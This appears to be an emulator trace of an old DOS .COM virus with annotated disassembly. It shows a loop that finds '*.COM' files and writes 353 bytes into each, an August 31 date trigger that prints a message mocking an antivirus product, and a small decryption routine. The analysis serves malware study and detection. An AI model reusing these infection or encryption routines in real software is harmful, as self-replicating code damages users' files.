2018-12-25T12:29:46.052441605Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.056391381Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.060168262Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.079360711Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.088642328Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.098044199Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.101374279Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.105735558Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.113503674Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.121433866Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.132111418Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.135891515Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.138984826Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.146738937Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.15571275Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.16475938Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.168515949Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.173050772Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.181301516Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.189165668Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.202595812Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.205862857Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.208877304Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.217619102Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.226615207Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.240601981Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.24358057Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.24637023Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.253796388Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.260574683Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.274471049Z 79 PC: 12aa9 | Find next file (See above)
; "Get date" window (INT 21h AH=2Ah). The check is month 8 / day 0x1f; anything else
; goes directly to int 0x20. Lines from 0x12ac6 are ASCII text mis-decoded as code.
2018-12-25T12:29:46.278082044Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8  ; month test
0x12ab6: jne 0x12ac4  ; mismatch: exit
0x12ab8: cmp dl, 0x1f  ; day test
0x12abb: jne 0x12ac4  ; mismatch: exit
0x12abd: mov ah, 9  ; DOS 09h print string
0x12abf: mov dx, 0x186  ; message offset; presumably maps to 0x12ac6 - confirm
0x12ac2: int 0x21
0x12ac4: int 0x20  ; end program
0x12ac6: or ax, 0x460a  ; 0D 0A 46 -> CR LF "F"
0x12ac9: sub ax, 0x5250  ; 2D 50 52 -> "-PR"
0x12acc: dec di  ; 4F -> "O"
0x12acd: push sp  ; 54 -> "T"
0x12ace: and byte ptr [bp + di + 0x55], dl  ; 20 53 55 -> " SU"
0x12ad1: pop ax  ; 58 -> "X"
0x12ad2: pop ax  ; 58 -> "X"
0x12ad3: pop ax  ; 58 -> "X"
0x12ad4: pop ax  ; 58 -> "X"
0x12ad5: and word ptr [di], cx  ; 21 0D -> "!" CR
0x12ad7: or dl, byte ptr [si + 0x42]  ; 0A 54 42 -> LF "TB"
0x12ada: inc cx  ; 41 -> "A"

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10940,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:46.196328084Z 78 PC: 12a9b | Find first file
; First "Get time" window of this run (INT 21h AH=2Ch). Read 0x12b26-0x12b38 as
; data and misaligned bytes, not as executed instructions.
2018-12-25T12:29:46.204225267Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX = DOS seconds/hundredths
0x12b1f: je 0x12b18  ; zero is not accepted: back to 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; DS:0x1EE = time word
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]  ; data: start of the mask "*.COM"
0x12b2a: dec bp  ; data: final "M" of the mask
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bx + si], al  ; data: 00 00
0x12b2f: add byte ptr [bx + si], al  ; data: 00 00
0x12b31: add al, ch  ; 00 E8: data byte followed by a call opcode at 0x12b32
0x12b33: inc bx  ; misaligned: part of E8 43 00 = call 0x12b78
0x12b34: add byte ptr [bp + di - 0x13c2], al  ; misaligned: holds 83 3E EC of `cmp word ptr [0x1ec], 0`
0x12b38: add word ptr [bx + si], ax  ; misaligned: 01 00 of the same cmp
0x12b3a: je 0x12b4a  ; loop exit when the counter is zero
0x12b3c: lodsw ax, word ptr [si]  ; AX <- [DS:SI]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; transform with key CX
0x12b43: stosw word ptr es:[di], ax  ; [ES:DI] <- AX
0x12b44: dec word ptr [0x1ec]  ; counter at DS:0x1EC
2018-12-25T12:29:46.207210467Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:46.215585857Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:46.22343443Z 62 PC: 12a7a | Close file
2018-12-25T12:29:46.241414969Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:46.245671444Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.248711456Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.258561386Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.266226816Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.275176057Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.279028112Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.28330299Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.290665677Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.298808061Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.30966388Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.312778164Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.31551131Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.324457089Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.332314167Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.341874379Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.346388803Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.348954868Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.356142614Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.370051738Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.379272066Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.382577672Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.386479519Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.394013166Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.40173091Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.411635537Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.41601349Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.419062256Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.426917288Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.43486046Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.44932553Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.452338164Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.456503436Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.46420738Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.476263395Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.487132246Z 79 PC: 12aa9 | Find next file (See above)
; "Get date" window (INT 21h AH=2Ah): date-conditional message, then program exit.
; 0x12ac6 onward is the message text decoded as instructions; do not read it as code.
2018-12-25T12:29:46.48987701Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8  ; DH (month) against 8
0x12ab6: jne 0x12ac4  ; different: exit without printing
0x12ab8: cmp dl, 0x1f  ; DL (day) against 31
0x12abb: jne 0x12ac4  ; different: exit without printing
0x12abd: mov ah, 9  ; print '$'-terminated string via INT 21h
0x12abf: mov dx, 0x186  ; offset of the string in DS (presumably the text at 0x12ac6 - confirm)
0x12ac2: int 0x21
0x12ac4: int 0x20  ; terminate the program
0x12ac6: or ax, 0x460a  ; string data: CR LF "F"
0x12ac9: sub ax, 0x5250  ; string data: "-PR"
0x12acc: dec di  ; string data: "O"
0x12acd: push sp  ; string data: "T"
0x12ace: and byte ptr [bp + di + 0x55], dl  ; string data: " SU"
0x12ad1: pop ax  ; string data: "X"
0x12ad2: pop ax  ; string data: "X"
0x12ad3: pop ax  ; string data: "X"
0x12ad4: pop ax  ; string data: "X"
0x12ad5: and word ptr [di], cx  ; string data: "!" CR
0x12ad7: or dl, byte ptr [si + 0x42]  ; string data: LF "TB"
0x12ada: inc cx  ; string data: "A"; the capture ends before the terminator